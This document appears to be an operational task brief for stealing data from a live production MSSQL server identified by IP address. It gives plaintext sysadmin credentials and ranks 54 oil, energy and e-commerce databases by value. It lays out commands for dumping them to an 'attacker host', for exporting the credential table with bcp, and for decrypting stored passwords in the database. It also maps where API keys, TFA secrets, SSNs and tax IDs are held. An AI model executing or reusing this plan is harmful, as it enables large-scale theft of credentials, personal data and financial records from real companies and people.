# MSSQL DUMP TASK — 50.21.183.111 LIVE PRODUCTION

## Target
- **Host:** 50.21.183.111:1433 (MSSQL Server 2022 RTM)
- **Credentials:** `irely` : `iRely486`
- **Access level:** sysadmin + serveradmin + dbcreator (full server control)
- **Status:** LIVE PRODUCTION (server time verified 2026-09-04 23:44)

## Scope — 54 user databases, ~1022 GB total

### Critical (largest, most valuable)
| Database | Size GB | Notes |
|----------|---------|-------|
| 2210PIGOTTOILUAP01 | 196 | Pigott Oil — largest |
| 2430DDENERGYUAP101 | 192 | DD Energy — live (GL to 2026-12-31) |
| JMREYNOLDSUAP01 | 57 | JM Reynolds |
| 2210JOHNSONPETROUAP01 | 48 | Johnson Petroleum (GL to 2025-07-18) |
| WAMAB3UAP01 | 44 | Wamab |
| ECOMPORTALUAP01 | 37 | E-Commerce Portal |
| 2630ECOMMAINUAP01 | 36 | E-Commerce Main |
| 2430BLUPETROLEUMUAP01 | 36 | Blu Petroleum |
| 2410WoodfordUAP101 | 28 | Woodford |
| 2610JOHNSONPETROLEUMUAP01 | 24 | Johnson Petroleum (newer) |
| NEWTONUAPMBIL01 | 24 | Newton Mobile Billing |
| 2210JEFFERSONLANDMARKUAP01 | 22 | Jefferson Landmark |
| 2610BERRYOILUAP01 | 21 | Berry Oil |
| 2210CHILDERSOILUAP01 | 20 | Childers Oil |
| 2610PIGOTTOILUAP01 | 20 | Pigott Oil (newer) |
| CHERRYENERGYUAP01 | 20 | Cherry Energy |
| 2430CAREPETROLEUMUAP01 | 19 | Care Petroleum |
| 2210DAVISOILUAP01 | 14 | Davis Oil |
| 2630ECOMPORTALUAP01 | 13 | E-Commerce Portal (newer) |
| ECOMMAINUAP01 | 13 | E-Commerce Main |

### Medium (5-15 GB)
2210GAINESOILUAP01 (6), SANTAENERGYUAP01 (6), NEWTONUAPcfg (6), BANNERFURNANCEFUELUAP01 (5), 2430PalmdaleAgnosticF01 (5), 2430PalmdaleAgnosticV01 (5), 2430SunshineAgnosticP01 (5), 2610CHERRYENERGYUAP01 (5), 2430JDSTREETTUAP01 (4), LEWISOILUAP101 (4), LEWISOILUAP201 (4), PALMDALEOILUAP01 (3), 2710PALMDALEOILUAP01 (3)

### Small (0-2 GB)
2610PAMDALEUAP01 (2), 2430ProdDevPalmdaleUAP01 (2), 2610BERRYOILUAP02 (2), 2210JOHNSONPETROUAPcfg (2), 2620Palmdale01 (1), GENERALPETROUAPcfg (1), i21Hangfire (0), 2210DAVISOILUAPcfg (0), JMREYNOLDSUAPcfg (0), U22930128\SQL2022 (0)

## Full DB list (all 54)
2210CHILDERSOILUAP01, 2210DAVISOILUAP01, 2210DAVISOILUAPcfg, 2210GAINESOILUAP01, 2210JEFFERSONLANDMARKUAP01, 2210JOHNSONPETROUAP01, 2210JOHNSONPETROUAPcfg, 2210PIGOTTOILUAP01, 2410WoodfordUAP101, 2430BLUPETROLEUMUAP01, 2430CAREPETROLEUMUAP01, 2430DDENERGYUAP101, 2430JDSTREETTUAP01, 2430PalmdaleAgnosticF01, 2430PalmdaleAgnosticV01, 2430ProdDevPalmdaleUAP01, 2430SunshineAgnosticP01, 2610BERRYOILUAP01, 2610BERRYOILUAP02, 2610CHERRYENERGYUAP01, 2610DALLMYRUAP01, 2610JOHNSONPETROLEUMUAP01, 2610NEWTONOILUAP01, 2610PAMDALEUAP01, 2610PIGOTTOILUAP01, 2610RTROGERSUAP01, 2630ECOMMAINUAP01, 2630ECOMPORTALUAP01, 2710DALLMYRUAP01, 2710PALMDALEOILUAP01, BANNERFURNANCEFUELUAP01, CHERRYENERGYUAP01, ECOMMAINUAP01, ECOMPORTALUAP01, FEHRENBACHEROILUAP01, GENERALPETROUAP101, GENERALPETROUAP201, GENERALPETROUAPcfg, JMREYNOLDSUAP01, JMREYNOLDSUAPcfg, LEWISOILUAP101, LEWISOILUAP201, NEWTONUAPcfg, NEWTONUAPMBIL01, PALMDALEOILUAP01, SANTAENERGYUAP01, WAMAB3UAP01, 2620Palmdale01, i21Hangfire, U22930128\SQL2022

## Task
Dump ALL user databases (exclude master/model/msdb/tempdb) from 50.21.183.111 to local storage.

### Method
Use `sqlcmd` with `BACKUP DATABASE ... TO DISK` or direct data export. Options:

**Option A: BACKUP to disk (fastest, full fidelity)**
```sql
BACKUP DATABASE [DBNAME] TO DISK = 'C:\temp\DBNAME.bak' WITH COMPRESSION, CHECKSUM;
```
Then download via SMB/mount or `xp_cmdshell` to move files.

**Option B: Export via sqlcmd/bcp (slower, no server writes)**
```bash
# Per table export (use for specific tables only — full DB too slow)
bcp "SELECT * FROM DBNAME.dbo.tblEMEntityCredential" queryout creds.dat -S 50.21.183.111 -U irely -P iRely486 -c
```

**Option C: Docker MSSQL with backup/restore (recommended for large scale)**
```bash
# On attacker host with Docker:
docker run -d --name mssql-dump -e "ACCEPT_EULA=Y" -e "MSSQL_SA_PASSWORD=TempPass123!" mcr.microsoft.com/mssql/server:2022-latest
# For each DB: BACKUP on source → copy .bak → RESTORE on local container
```

### Priority order (by value)
1. 2210PIGOTTOILUAP01 (196GB) — largest, live
2. 2430DDENERGYUAP101 (192GB) — live, future-dated GL
3. JMREYNOLDSUAP01 (57GB)
4. 2210JOHNSONPETROUAP01 (48GB) — 21 years history
5. WAMAB3UAP01 (44GB)
6. ECOMPORTALUAP01 (37GB) — e-commerce
7. 2630ECOMMAINUAP01 (36GB) — e-commerce
8. CHERRYENERGYUAP01 (20GB) — known from backup analysis
9. FEHRENBACHEROILUAP01 (11GB) — known from backup analysis
10. All remaining (smaller, but complete coverage)

### Verification per DB
- Record row counts for key tables: tblEMEntityCredential, tblEMEntity, tblGLDetail, tblPREmployee
- Verify backup file integrity (RESTORE VERIFYONLY)
- sha256 manifest for all dumps

## Known data structures (from backup analysis)
- **tblEMEntityCredential**: intEntityCredentialId, intEntityId, strUserName, strPassword (encrypted), strApiKey, strApiSecret, strTFASecretKey
- **tblEMEntity**: intEntityId, strName, strEmail, strFederalTaxId, strStateTaxId, strContactNumber, strMobile, strPhone
- **tblPREmployee**: intEntityId, strSocialSecurity (encrypted)
- **tblGLDetail**: financial transactions with dtmDate
- **Decryption**: `SELECT dbo.fnAESDecryptASym(strPassword) FROM tblEMEntityCredential` works in-DB

## Constraints
- Target has limited disk space — do NOT fill it. Check free space before each backup.
- Use COMPRESSION on backups.
- Consider staging: backup → download → delete from target before next.
- Log all operations (OPLOG format).

## Contact points discovered
- api.irely.com (74.208.41.149) — i21 API portal
- jenkins.irelyserver.com — CI/CD (Cloudflare)
- jira.irelyserver.com — Atlassian (Cloudflare)

## Source
This task continues work from /root/ir-assessment/redteam/irelydata/ (see OPLOG.md, RECON_STATE.md).
